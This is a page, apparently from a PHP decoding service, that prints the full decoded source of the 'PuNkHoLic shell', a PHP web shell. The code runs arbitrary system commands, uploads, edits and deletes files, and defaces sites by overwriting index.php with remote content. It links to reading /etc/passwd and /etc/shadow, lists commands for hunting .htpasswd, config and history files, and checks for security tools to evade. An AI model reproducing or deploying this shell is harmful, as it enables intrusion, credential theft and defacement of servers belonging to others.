Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<html> <head> <title>PuNkHoLic shell</title> <link href="https://fonts.googleapis.com/c..
Decoded Output download
<html>
<head>
<title>PuNkHoLic shell</title>
<link href="https://fonts.googleapis.com/css?family=Josefin+Sans:400,100" rel="stylesheet">
</head>
<style>
body{
font-family:Josefin Sans,sans-serif;
background:black;
color:#ABEFFF;
}
}
.loginpage{
height:400px;
width:500px;
border:1px solid;
border-color:#ABEFFF;
text-align:center;
border-radius:5px;
margin-top:100px;
}
#pageheading{
font-size:25px;
color:#ABEFFF;
margin-top:10px;
}
.loginpage img{
width:500px;
}
input{
background:black;
border-color:#ABEFFF;
border-radius:10px;
margin-top:10px;
padding:5px;
color:#ABEFFF;
}
input:hover{
background:#ABEFFF;
color:red;
}
</style>
<body>
</body>
</html>
<?php
}
exit;
}
if(!isset( $_SESSION[md5($_SERVER['HTTP_HOST'])]))
if(empty( $auth_pass )||
(isset($_POST['pass']) &&($_POST['pass']) == $auth_pass&& ($_POST['uname']) == $UserName))
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
else
printLogin();
if(strtolower(substr(PHP_OS,0,3))=="win")
$os='win';
else
$os='nix';
$safe_mode=@ini_get('safe_mode');
$disable_functions = @ini_get('disable_functions');
$home_cwd=@getcwd();
if( isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if( $os == 'win') {
$home_cwd=str_replace("\", "/", $home_cwd);
$cwd=str_replace("\", "/", $cwd);
}
if($cwd[strlen($cwd)-1]!= '/' )
$cwd .= '/';
if($os=='win'){
$aliases = array(
"List Directory" => "dir",
"Find index.php in current dir" => "dir /s /w /b index.php",
"Find *config*.php in current dir" => "dir /s /w /b *config*.php",
"Show active connections" => "netstat -an",
"Show running services" => "net start",
"User accounts" => "net user",
"Show computers" => "net view",
"ARP Table" => "arp -a",
"IP Configuration" => "ipconfig /all"
);
}
else{
$aliases = array(
"List dir" => "ls -la",
"list file attributes on a Linux second extended file system" => "lsattr -va",
"show opened ports" => "netstat -an | grep -i listen",
"Find" => "",
"find all suid files" => "find / -type f -perm -04000 -ls",
"find suid files in current dir" => "find . -type f -perm -04000 -ls",
"find all sgid files" => "find / -type f -perm -02000 -ls",
"find sgid files in current dir" => "find . -type f -perm -02000 -ls",
"find config.inc.php files" => "find / -type f -name config.inc.php",
"find config* files" => "find / -type f -name \"config*\"",
"find config* files in current dir" => "find . -type f -name \"config*\"",
"find all writable folders and files" => "find / -perm -2 -ls",
"find all writable folders and files in current dir" => "find . -perm -2 -ls",
"find all service.pwd files" => "find / -type f -name service.pwd",
"find service.pwd files in current dir" => "find . -type f -name service.pwd",
"find all .htpasswd files" => "find / -type f -name .htpasswd",
"find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
"find all .bash_history files" => "find / -type f -name .bash_history",
"find .bash_history files in current dir" => "find . -type f -name .bash_history",
"find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
"find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
"Locate" => "",
"locate httpd.conf files" => "locate httpd.conf",
"locate vhosts.conf files" => "locate vhosts.conf",
"locate proftpd.conf files" => "locate proftpd.conf",
"locate psybnc.conf files" => "locate psybnc.conf",
"locate my.conf files" => "locate my.conf",
"locate admin.php files" =>"locate admin.php",
"locate cfg.php files" => "locate cfg.php",
"locate conf.php files" => "locate conf.php",
"locate config.dat files" => "locate config.dat",
"locate config.php files" => "locate config.php",
"locate config.inc files" => "locate config.inc",
"locate config.inc.php" => "locate config.inc.php",
"locate config.default.php files" => "locate config.default.php",
"locate config* files " => "locate config",
"locate .conf files"=>"locate '.conf'",
"locate .pwd files" => "locate '.pwd'",
"locate .sql files" => "locate '.sql'",
"locate .htpasswd files" => "locate '.htpasswd'",
"locate .bash_history files" => "locate '.bash_history'",
"locate .mysql_history files" => "locate '.mysql_history'",
"locate .fetchmailrc files" => "locate '.fetchmailrc'",
"locate backup files" => "locate backup",
"locate dump files" => "locate dump",
"locate priv files" => "locate priv"
);
}
if(isset($_POST['p1']) && $_POST['p1']=='deface') {
$def = file_get_contents($deface_url);
file_put_contents($_POST['c'].$_POST['p2'],$def);
}
function ex($in) {
$out = '';
if ( function_exists(' exec ')) {
@exec($in,$out);
$out = @join("
",$out);
}elseif(function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
}elseif(function_exists('system')) {
ob_start();
@system($in);
$out = ob_get_clean();
}elseif(function_exists('shell_exec')) {
$out = shell_exec($in);
}elseif(is_resource($f = @popen($in,"r"))) {
$out = "";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
return $out;
}
function which($p) {
$path = ex('which '.$p);
if(!empty($path))
return $path;
return false;
}
function printHeader() {
if(empty($_POST['charset']))
$_POST['charset'] = "UTF-8";
global $color;
global $Theme;
global $TabsColor;
echo "<html><head><link href='https://fonts.googleapis.com/css?family=Josefin+Sans:400,100' rel='stylesheet' type='text/css'></head>";
echo '<html>
<meta http-equiv="Content-Type" content="text/html; charset='.$_POST['charset'].'"><title>PuNkHoLic Shell</title>
<style>
body {background-color:black;color:#fff;}
body,td,th{ font-family: Josefin Sans, sans-serif;font-size:13px;margin:0;vertical-align:top; }
span,h1,a{ color:'.$color.' !important; }
span{ font-weight: bolder; }
h1{ padding: 0px 5px;font: 14pt audiowide;margin:0px 0 0 0px; }
div.content{ padding: 0px;margin:0 0px;background: #0F1010;border:1px solid '.$Theme.'; border-radius:5px;}
a{ text-decoration:none; }
a:hover{ border-bottom:0px solid #5e5e5e;text-decoration:none; }
a:hover{cursor: url("http://downloads.totallyfreecursors.com/cursor_files/pakistan.ani"), url("http://downloads.totallyfreecursors.com/thumbnails/PAKISTAN.gif"), auto;text-decoration:none;}
.ml1{ border:1px solid '.$Theme.';padding:px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:250px;margin-top:0px; border-radius:10px; border-color:'.$Theme.'; background:#2F2F2F;}
input, textarea, select{ margin-top:0;color:#63E1FF;background-color:black;border-radius:5px;border:1px solid '.$Theme.'; border-radis:5px;font: 10pt arial,"Courier New"; }
input[type="button"]:hover,input[type="submit"]:hover {background-color:#094F60;color:black;text-decoration:none;}
form{ margin:0px; background:#0F1010;}
#toolsTbl{ text-align:center; }
.toolsInp{ width: 80%; background:black; border-radius:5px; border-color:'.$Theme.'; }
.main th{text-align:left;background-color:'.$TabsColor.';}
.main tr:hover{background:'.$Theme.'; border:5px solid;border-color:'.$Theme.';}
.main td, th{vertical-align:middle;}
.menu { height:30px; border-radius:10px;}
.menu th{padding:1px;border-radius: 5px;background:'.$TabsColor.'; -webkit-transform: rotate(20deg);
-moz-transform: rotate(20deg);
-o-transform: rotate(20deg);
-ms-transform: rotate(20deg);
transform: rotate(20deg);}
.menu th:hover{background:#0F1010;text-decoration: none;}
pre {font-family: Josefin Sans, sans-serif;color:#FFFFFF;}
#cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
.cpr {margin-bottom:5px;font-weight:bold; }
.cpb {width:34px;margin:0 5px;}
.npoad td {padding:0;}
#PuNkHoLictools{
margin-top:50px;
width:500px;
border:1px solid;
border-radius:10px;
}
.PuNkHoLiclogo td{
font-size:12px;
font-weight:bold;
}
.PuNkHoLiclogo{
margin-left:5px;
background-repeat: no-repeat;
background-position: CENTER;
background-color:#0F1010;
background-size: 400px 120px;
}
</style>
</html>
<style type="text/css">body, a:hover {text-decoration:none;cursor: url(http://cur.cursors-4u.net/cursors/cur-11/cur1054.cur), progress !important;}</style><a href="http://www.cursors-4u.com/cursor/2012/02/11/chrome-pointer.html" target="_blank" title="Chrome Pointer"><img src="http://cur.cursors-4u.net/cursor.png" border="0" alt="Chrome Pointer" style="position:absolute; top: 0px; right: 0px;" /></a>
<script>
function set(a,c,p1,p2,p3,charset) {
if(a != null)document.mf.a.value=a;
if(c != null)document.mf.c.value=c;
if(p1 != null)document.mf.p1.value=p1;
if(p2 != null)document.mf.p2.value=p2;
if(p3 != null)document.mf.p3.value=p3;
if(charset != null)document.mf.charset.value=charset;
}
function g(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
document.mf.submit();
}
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
var params = "ajax=true";
for(i=0;i<document.mf.elements.length;i++)
params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
sr("'.$_SERVER['REQUEST_URI'].'", params);
}
function sr(url, params) {
if (window.XMLHttpRequest) {
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open("POST", url, true);
req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
req.send(params);
}
else if (window.ActiveXObject) {
req = new ActiveXObject("Microsoft.XMLHTTP");
if (req) {
req.onreadystatechange = processReqChange;
req.open("POST", url, true);
req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
req.send(params);
}
}
}
function processReqChange() {
if( (req.readyState == 4) )
if(req.status == 200) {
//alert(req.responseText);
var reg = new RegExp("(\d+)([\S\s]*)", "m");
var arr=reg.exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
}
else alert("Request error!");
}
</script>
<head><link href="https://fonts.googleapis.com/css?family=Audiowide" ></head><body><div style="position:absolute;width:100%;top:0;left:0;"><div style="margin:5px;background:black;"><div class="content" style="border:1px solid '.$Theme.'; border-radius:5px;">
<form method=post name=mf style="display:none;">
<input type=hidden name=a value="'.(isset($_POST['a'])?$_POST['a']:'').'">
<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
<input type=hidden name=p1 value="'.(isset($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'">
<input type=hidden name=p2 value="'.(isset($_POST['p2'])?htmlspecialchars($_POST['p2']):'').'">
<input type=hidden name=p3 value="'.(isset($_POST['p3'])?htmlspecialchars($_POST['p3']):'').'">
<input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
</form>';
$freeSpace = @diskfreespace($GLOBALS['cwd']);
$totalSpace = @disk_total_space($GLOBALS['cwd']);
$totalSpace = $totalSpace?$totalSpace:1;
$disable_functions = @ini_get('disable_functions');
$release = @php_uname('r');
$kernel = @php_uname('s');
if(!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(@posix_geteuid());
$gid = @posix_getgrgid(@posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$cwd_links = '';
$path = explode("/", $GLOBALS['cwd']);
$n=count($path);
for($i=0;$i<$n-1;$i++) {
$cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
for($j=0;$j<=$i;$j++)
$cwd_links .= $path[$j].'/';
$cwd_links .= "\")'>".$path[$i]."/</a>";
}
$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
$opt_charsets = '';
foreach($charsets as $item)
$opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
$m = array('Import Scripts'=>'ImportScripts','Jumping'=>'Jumping','Symlink'=>'Symlink','Domains' => 'Domain','Shared Hostings'=>'Shared','Sym Sites'=>'Sym','Subdomain'=>'Subdomain','Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Safe Mode'=>'Bypass','String tools'=>'StringTools','Defacer' => 'Deface','Recursive Defacer'=>'Defacer');
if(!empty($GLOBALS['auth_pass']))
$m['Logout'] = 'Logout';
$menu = '';
foreach($m as $k => $v)
$menu .= '<th><a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a></th>';
$drives = "";
if ($GLOBALS['os'] == 'win') {
foreach( range('a','z') as $drive ){
if (is_dir($drive.':\'))
$drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
}
$drives .= '<br />: ';
}
if($GLOBALS['os'] == 'nix') {
$dominios = @file_get_contents("/etc/named.conf");
if(!$dominios) {
$DomainS = "/var/named";
$Domainonserver = scandir($DomainS);
$d0c = count($Domainonserver);
} else {
@preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
$out = sizeof(array_unique($out[1]));
$d0c = $out."Domains";
}
} else {
$d0c = "Nothing here bro:(";
}
if($GLOBALS['os'] == 'nix' )
{
$usefl = ''; $dwnldr = '';
if(!@ini_get('safe_mode')) {
$temp = array();
$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
foreach($userful as $item) { if(which($item)) $temp[]= $item; }
$usefl = implode(', ',$temp);
$temp = array();
$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
foreach($downloaders as $item2) { if(which($item2)) $temp[]= $item2; }
$dwnldr = implode(', ',$temp);
} else {
$usefl = ' ------- '; $dwnldr = ' ------- ';
}
} else {
$usefl = ' ------- '; $dwnldr = ' ------- ';
}
echo '<div class="PuNkHoLiclogo"><table class="info" cellpadding="0" cellspacing="0" width="100%"><tr>
<td><table cellpadding="3" cellspacing="0" class="npoad"><tr><td width="80px;"><span>Uname</span></td><td>: <nobr>'.substr(@php_uname(), 0, 120).'</nobr></td></tr>
<tr><td><span>User</span></td><td>: '.$uid.' ( '.$user.' ) <span>Group: </span> '.$gid.' ( '.$group.' )</td></tr><tr><td><span>Server</span></td><td>: '.@getenv('SERVER_SOFTWARE').'</td></tr><tr><td><span>Useful</span></td><td>: '.$usefl.'</td></tr><tr><td><span>Downloaders</span></td><td>: '.$dwnldr.'</td></tr><tr><td><span>D/functions</span></td><td>: '.($disable_functions?$disable_functions:'All Function Enable').'</td></tr><tr><td><span>'.($GLOBALS['os'] == 'win'?'Drives<br />Cwd':'Cwd').'</span></td><td>: '.$drives.''.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a></td></tr></table></td>'.
'<td width=4><nobr><span>Sv IP</span><br><span>Your IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>'.
'<td><nobr>: '.gethostbyname($_SERVER["HTTP_HOST"]).'<br>: '.$_SERVER['REMOTE_ADDR'].'<br />: '.viewSize($totalSpace).'<br />: '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>: '.@phpversion().' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a><br />: '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color='.$color.'<b>OFF</b></font>').'<br />: '.$d0c.'</nobr></td></tr></table></div>'.
'</div></div><div style="margin:5;background:black;"><div class="content" style="border-top:5px solid 430303;padding:2px;"><table cellpadding="3" cellspacing="0" width="100%" class="menu"><tr>'.$menu.'</tr></table></div></div><div style="margin:5;background:black;">';
}
function printFooter() {
$is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
echo '</div><div style="margin:5px;background:black;"><div class="content" style="border:1px solid '.$Theme.'; border-radius:5px;">
<table class="info" id="toolsTbl" cellpadding="3" cellspacing="0" width="100%">
<tr>
<td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="'.htmlspecialchars($GLOBALS['cwd']).'"><input type=submit value=">>"></form></td>
<td><form onsubmit="g(\'FilesTools\',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
</tr>
<tr>
<td><form onsubmit="g(\'FilesMan\',null,\'mkdir\',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form>'.$is_writable.'</td>
<td><form onsubmit="g(\'FilesTools\',null,this.f.value,\'mkfile\');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form>'.$is_writable.'</td>
</tr>
<tr>
<td><form onsubmit="g(\'Console\',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
<td><form method="post" ENCTYPE="multipart/form-data">
<input type=hidden name=a value="FilesMAn">
<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
<input type=hidden name=p1 value="uploadFile">
<input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
<span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form>'.$is_writable.'</td>
</tr>
</table></div></div>
<div style="margin:5px;background:black;"><div class="content" style="border:2px solid '.$Theme.';text-align:center;font-weight:bold; border-radius:10px;margin:auto; width:500;">PuNkHoLic Shell coded by <a href="https://www.facebook.com/niraj.ghimire.5454"> PuNkHoLic</a></div></div>
</div>
</body></html>';
}
if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
function viewSize($s) {
if($s >= 1073741824)
return sprintf('%1.2f', $s / 1073741824 ). ' GB';
elseif($s >= 1048576)
return sprintf('%1.2f', $s / 1048576 ) . ' MB';
elseif($s >= 1024)
return sprintf('%1.2f', $s / 1024 ) . ' KB';
else
return $s . ' B';
}
function perms($p) {
if (($p & 0xC000) == 0xC000)$i = 's';
elseif (($p & 0xA000) == 0xA000)$i = 'l';
elseif (($p & 0x8000) == 0x8000)$i = '-';
elseif (($p & 0x6000) == 0x6000)$i = 'b';
elseif (($p & 0x4000) == 0x4000)$i = 'd';
elseif (($p & 0x2000) == 0x2000)$i = 'c';
elseif (($p & 0x1000) == 0x1000)$i = 'p';
else $i = 'u';
$i .= (($p & 0x0100) ? 'r' : '-');
$i .= (($p & 0x0080) ? 'w' : '-');
$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
$i .= (($p & 0x0020) ? 'r' : '-');
$i .= (($p & 0x0010) ? 'w' : '-');
$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
$i .= (($p & 0x0004) ? 'r' : '-');
$i .= (($p & 0x0002) ? 'w' : '-');
$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
return $i;
}
function viewPermsColor($f) {
if (!@is_readable($f))
return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
elseif (!@is_writable($f))
return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
else
return '<font color=#00BB00><b>'.perms(@fileperms($f)).'</b></font>';
}
if(!function_exists("scandir")) {
function scandir($dir) {
$dh= opendir($dir);
while (false !== ($filename = readdir($dh))) {
$files[] = $filename;
}
return $files;
}
}
function actionSecInfo() {
printHeader();
echo '<h1>Server security information</h1><div class=content>';
function showSecParam($n, $v) {
$v = trim($v);
if($v) {
echo '<span>'.$n.': </span>';
if(strpos($v, "
") === false)
echo $v.'<br>';
else
echo '<pre class=ml1>'.$v.'</pre>';
}
}
showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
showSecParam('Open base dir', @ini_get('open_basedir'));
showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
$temp=array();
if(function_exists('mysql_get_client_info'))
$temp[] = "MySql (".mysql_get_client_info().")";
if(function_exists('mssql_connect'))
$temp[] = "MSSQL";
if(function_exists('pg_connect'))
$temp[] = "PostgreSQL";
if(function_exists('oci_connect'))
$temp[] = "Oracle";
showSecParam('Supported databases', implode(', ', $temp));
echo '<br>';
if( $GLOBALS['os'] == 'nix' ) {
$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
$danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
showSecParam('OS version', @file_get_contents('/proc/version'));
showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
if(!$GLOBALS['safe_mode']) {
echo '<br>';
$temp=array();
foreach ($userful as $item)
if(which($item)){$temp[]=$item;}
showSecParam('Userful', implode(', ',$temp));
$temp=array();
foreach ($danger as $item)
if(which($item)){$temp[]=$item;}
showSecParam('Danger', implode(', ',$temp));
$temp=array();
foreach ($downloaders as $item)
if(which($item)){$temp[]=$item;}
showSecParam('Downloaders', implode(', ',$temp));
echo '<br/>';
showSecParam('Hosts', @file_get_contents('/etc/hosts'));
showSecParam('HDD space', ex('df -h'));
showSecParam('Mount options', @file_get_contents('/etc/fstab'));
}
} else {
showSecParam('OS Version',ex('ver'));
showSecParam('Account Settings',ex('net accounts'));
showSecParam('User Accounts',ex('net user'));
}
echo '</div>';
printFooter();
}
function actionFilesMan() {
printHeader();
echo '<h1>File manager</h1><div class=content>';
if(isset($_POST['p1']) && $_POST['p1']!='deface') {
switch($_POST['p1']) {
case 'uploadFile':
if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
echo "Can't upload file!";
break;
break;
case 'mkdir':
if(!@mkdir($_POST['p2']))
echo "Can't create new dir";
break;
case 'delete':
function deleteDir($path) {
$path = (substr($path,-1)=='/') ? $path:$path.'/';
$dh= opendir($path);
while ( ($item = readdir($dh) ) !== false) {
$item = $path.$item;
if ( (basename($item) == "..") || (basename($item) == ".") )
continue;
$type = filetype($item);
if ($type == "dir")
deleteDir($item);
else
@unlink($item);
}
closedir($dh);
rmdir($path);
}
if(is_array(@$_POST['f']))
foreach($_POST['f'] as $f) {
$f = urldecode($f);
if(is_dir($f))
deleteDir($f);
else
@unlink($f);
}
break;
case 'paste':
if($_SESSION['act'] == 'copy') {
function copy_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h = opendir($c.$s);
while (($f = readdir($h)) !== false)
if (($f != ".") and ($f != "..")) {
copy_paste($c.$s.'/',$f, $d.$s.'/');
}
} elseif(is_file($c.$s)) {
@copy($c.$s, $d.$s);
}
}
foreach($_SESSION['f'] as $f)
copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);
} elseif($_SESSION['act'] == 'move') {
function move_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h = opendir($c.$s);
while (($f = readdir($h)) !== false)
if (($f != ".") and ($f != "..")) {
copy_paste($c.$s.'/',$f, $d.$s.'/');
}
} elseif(is_file($c.$s)) {
@copy($c.$s, $d.$s);
}
}
foreach($_SESSION['f'] as $f)
@rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
}
unset($_SESSION['f']);
break;
default:
if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
$_SESSION['act'] = @$_POST['p1'];
$_SESSION['f'] = @$_POST['f'];
foreach($_SESSION['f'] as $k => $f)
$_SESSION['f'][$k] = urldecode($f);
$_SESSION['cwd'] = @$_POST['c'];
}
break;
}
echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
}
$dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
if($dirContent === false) {echo 'Can\'t open this folder!'; return;}
global $sort;
$sort = array('name', 1);
if(!empty($_POST['p1'])) {
if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
$sort = array($match[1], (int)$match[2]);
}
echo '<script>
function sa() {
for(i=0;i<document.files.elements.length;i++)
if(document.files.elements[i].type == \'checkbox\')
document.files.elements[i].checked = document.files.elements[0].checked;
}
</script>
<table width=\'100%\' class=\'main\' cellspacing=\'0\' cellpadding=\'2\'>
<form name=files method=post>';
echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
$dirs = $files = $links = array();
$n = count($dirContent);
for($i=0;$i<$n;$i++) {
$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
$tmp = array('name' => $dirContent[$i],
'path' => $GLOBALS['cwd'].$dirContent[$i],
'modify' => @date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
);
if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
$files[] = array_merge($tmp, array('type' => 'file'));
elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
$links[] = array_merge($tmp, array('type' => 'link'));
elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
$dirs[] = array_merge($tmp, array('type' => 'dir'));
}
$GLOBALS['sort'] = $sort;
function cmp($a, $b) {
if($GLOBALS['sort'][0] != 'size')
return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
else
return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
}
usort($files, "cmp");
usort($dirs, "cmp");
usort($links, "cmp");
$files = array_merge($dirs, $links, $files);
$l = 0;
foreach($files as $f) {
echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
.'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
$l = $l?0:1;
}
echo '<tr><td colspan=5>
<input type=hidden name=a value=\'FilesMan\'>
<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
<input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
<select name=\'p1\'><option value=\'copy\'>Copy</option><option value=\'move\'>Move</option><option value=\'delete\'>Delete</option>';
if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){echo '<option value=\'paste\'>Paste</option>'; }
echo '</select> <input type="submit" value=">>"></td><td colspan="2" align="right" width="1"><input name="def" id="def" value="index.php" size="10"/> <input type="button" onclick="g(\'FilesMan\',\''.htmlspecialchars($GLOBALS['cwd']).'\',\'deface\',document.getElementById(\'def\').value)" value="Add your Deface"></td></tr>
</form></table></div>';
printFooter();
}
function actionStringTools() {
if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return strtoupper($r);}}
if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
if(isset($_POST['ajax'])) {
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
ob_start();
if(function_exists($_POST['p1']))
echo $_POST['p1']($_POST['p2']);
